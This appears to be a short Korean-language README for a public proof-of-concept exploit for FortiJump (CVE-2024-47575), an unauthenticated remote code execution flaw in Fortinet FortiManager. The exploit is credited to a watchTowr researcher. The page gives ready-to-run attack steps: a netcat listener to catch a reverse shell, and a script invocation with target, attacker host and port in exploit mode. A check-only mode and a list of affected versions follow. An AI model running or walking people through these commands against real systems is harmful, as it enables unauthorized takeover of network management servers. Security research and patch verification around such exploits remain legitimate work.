Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager 인증되지 않은 원격 코드 실행(일명 FortiJump CVE-2024-47575)
기술적인 세부 사항은 블로그 게시물을 참조하세요.
시작하려면 ncat 세션을 설정하세요.
nc -lvvnp 80
그런 다음 탐지 아티팩트 생성기를 실행합니다.
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
취약점만 확인하려면 다음 옵션을 사용하세요.
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
이 익스플로잇은 watchTowr(@watchtowrcyber)의 Sina Kheirkhah(@SinSinology)가 작성했습니다.
최신 보안 연구를 보려면 watchTowr Labs 팀을 팔로우하세요.
